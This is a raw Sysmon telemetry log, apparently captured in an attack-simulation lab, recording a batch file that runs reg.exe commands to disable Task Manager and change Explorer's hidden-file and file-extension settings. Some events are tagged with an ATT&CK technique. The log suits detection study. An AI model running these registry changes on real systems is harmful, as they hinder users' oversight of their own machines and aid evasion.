12:04:39.489{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.489{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.496{266CAFBE-6557-6064-3901-00000000AE01}3144C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.489{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHiddenDWORD (0x00000001) 10341000x80000000000000009384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.474{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009382Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009381Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.474{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.484{266CAFBE-6557-6064-3801-00000000AE01}2744C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.474{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000001) 10341000x80000000000000009375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.474{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.474{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.474{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.474{266CAFBE-6557-6064-3701-00000000AE01}4052C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1158SetValue2021-03-31 12:04:39.458{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExtDWORD (0x00000001) 10341000x80000000000000009366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.458{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.458{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.458{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.458{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.458{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.465{266CAFBE-6557-6064-3601-00000000AE01}5804C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 13241300x80000000000000009358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.458{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgrDWORD (0x00000001) 10341000x80000000000000009357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.442{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-3501-00000000AE01}7144C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.442{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
